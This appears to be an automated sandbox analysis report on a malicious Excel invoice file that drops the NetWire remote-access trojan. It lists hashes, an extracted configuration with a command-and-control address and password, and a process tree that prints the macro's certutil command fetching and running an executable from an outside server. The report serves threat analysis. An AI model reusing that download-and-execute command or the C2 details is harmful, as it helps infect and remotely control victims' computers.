Analysis

  • max time kernel
    102s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    17-11-2022 07:15

General

  • Target

    Tax Invoice.xlsm

  • Size

    42KB

  • MD5

    241d9fbb42762beb00492d32d5e9d291

  • SHA1

    e6f1f8bbc40a59911543be499e1e07b54d55c3f4

  • SHA256

    e7df88b691f820535f249821d16054a01f33e0acf3ae12d0b64f98cced910012

  • SHA512

    a503b4e51bb09fa2e5c1b2a546cbf0c562200e77e67f2f81757f0b6f5460cc38e33d0ea871b7f7c1d92ed82ac3ca756a37e08a5e633077a560c9627516ea9aef

  • SSDEEP

    768:IvjsCvCssn3uBIJYfTH+niSpKvDH7Nv+nWhFFiKk/f7qtNhTxRB+nE2g7/:IvDvCT3uG1ByT7Nv+qFFi3/jqLxxyE2g

Malware Config

Extracted

Family

netwire

C2

212.193.30.230:3345

Attributes
  • activex_autorun

    false

  • copy_executable

    false

  • delete_original

    false

  • host_id

    HostId-%Rand%

  • keylogger_dir

    %AppData%\Logs\

  • lock_executable

    false

  • offline_keylogger

    true

  • password

    Password@9

  • registry_autorun

    false

  • use_mutex

    false

Signatures

  • NetWire RAT payload 8 IoCs
  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Tax Invoice.xlsm"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1204
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c certutil.exe -urlcache -split -f "http://192.3.194.246/ecs.exe" Niipxzvceptnltqinb.exe.exe && Niipxzvceptnltqinb.exe.exe
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:360
      • C:\Windows\SysWOW64\certutil.exe
        certutil.exe -urlcache -split -f "http://192.3.194.246/ecs.exe" Niipxzvceptnltqinb.exe.exe
        3⤵
          PID:664
        • C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
          Niipxzvceptnltqinb.exe.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:268
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c ping google.com
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1208
            • C:\Windows\SysWOW64\PING.EXE
              ping google.com
              5⤵
              • Runs ping.exe
              PID:428
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwAA==
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1672
          • C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
            C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
            4⤵
            • Executes dropped EXE
            PID:1356

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    2
    T1082

    Query Registry

    1
    T1012

    Remote System Discovery

    1
    T1018

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
      Filesize

      7KB

      MD5

      828988c5e283c07b481aae790b9f1664

      SHA1

      68240ab5ec927d8ee2af027110faee0f2531c828

      SHA256

      44676f7732f4e6adfe2ba94d8e7dbaf4f6bf9d46f81118081f0f3a64f3fcb133

      SHA512

      1a40e9d93a7689a9cce3bc3255b92cc2c9456efc6ebe246dfc6d2a8abeea137cd79469e0565a785bf6f4a2b79559297cf54b1e75d521b8a4df03e4cda6fe0a8d

    • C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
      Filesize

      7KB

      MD5

      828988c5e283c07b481aae790b9f1664

      SHA1

      68240ab5ec927d8ee2af027110faee0f2531c828

      SHA256

      44676f7732f4e6adfe2ba94d8e7dbaf4f6bf9d46f81118081f0f3a64f3fcb133

      SHA512

      1a40e9d93a7689a9cce3bc3255b92cc2c9456efc6ebe246dfc6d2a8abeea137cd79469e0565a785bf6f4a2b79559297cf54b1e75d521b8a4df03e4cda6fe0a8d

    • C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
      Filesize

      7KB

      MD5

      828988c5e283c07b481aae790b9f1664

      SHA1

      68240ab5ec927d8ee2af027110faee0f2531c828

      SHA256

      44676f7732f4e6adfe2ba94d8e7dbaf4f6bf9d46f81118081f0f3a64f3fcb133

      SHA512

      1a40e9d93a7689a9cce3bc3255b92cc2c9456efc6ebe246dfc6d2a8abeea137cd79469e0565a785bf6f4a2b79559297cf54b1e75d521b8a4df03e4cda6fe0a8d

    • \Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
      Filesize

      7KB

      MD5

      828988c5e283c07b481aae790b9f1664

      SHA1

      68240ab5ec927d8ee2af027110faee0f2531c828

      SHA256

      44676f7732f4e6adfe2ba94d8e7dbaf4f6bf9d46f81118081f0f3a64f3fcb133

      SHA512

      1a40e9d93a7689a9cce3bc3255b92cc2c9456efc6ebe246dfc6d2a8abeea137cd79469e0565a785bf6f4a2b79559297cf54b1e75d521b8a4df03e4cda6fe0a8d

    • memory/268-72-0x000000000C7F0000-0x000000000CA00000-memory.dmp
      Filesize

      2.1MB

    • memory/268-68-0x00000000001F0000-0x00000000001F8000-memory.dmp
      Filesize

      32KB

    • memory/268-66-0x0000000000000000-mapping.dmp
    • memory/360-61-0x0000000000000000-mapping.dmp
    • memory/428-71-0x0000000000000000-mapping.dmp
    • memory/664-62-0x0000000000000000-mapping.dmp
    • memory/1204-60-0x00000000007D1000-0x00000000007D5000-memory.dmp
      Filesize

      16KB

    • memory/1204-59-0x00000000007D1000-0x00000000007D5000-memory.dmp
      Filesize

      16KB

    • memory/1204-58-0x00000000729BD000-0x00000000729C8000-memory.dmp
      Filesize

      44KB

    • memory/1204-57-0x0000000075C11000-0x0000000075C13000-memory.dmp
      Filesize

      8KB

    • memory/1204-54-0x000000002F461000-0x000000002F464000-memory.dmp
      Filesize

      12KB

    • memory/1204-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1204-97-0x00000000729BD000-0x00000000729C8000-memory.dmp
      Filesize

      44KB

    • memory/1204-96-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1204-55-0x00000000719D1000-0x00000000719D3000-memory.dmp
      Filesize

      8KB

    • memory/1204-77-0x00000000729BD000-0x00000000729C8000-memory.dmp
      Filesize

      44KB

    • memory/1208-70-0x0000000000000000-mapping.dmp
    • memory/1356-86-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

    • memory/1356-88-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

    • memory/1356-80-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

    • memory/1356-82-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

    • memory/1356-84-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

    • memory/1356-85-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

    • memory/1356-95-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

    • memory/1356-79-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

    • memory/1356-89-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

    • memory/1356-94-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

    • memory/1356-90-0x000000000040242D-mapping.dmp
    • memory/1672-76-0x0000000004CA0000-0x0000000004F72000-memory.dmp
      Filesize

      2.8MB

    • memory/1672-78-0x0000000066AA0000-0x000000006704B000-memory.dmp
      Filesize

      5.7MB

    • memory/1672-75-0x0000000066AA0000-0x000000006704B000-memory.dmp
      Filesize

      5.7MB

    • memory/1672-73-0x0000000000000000-mapping.dmp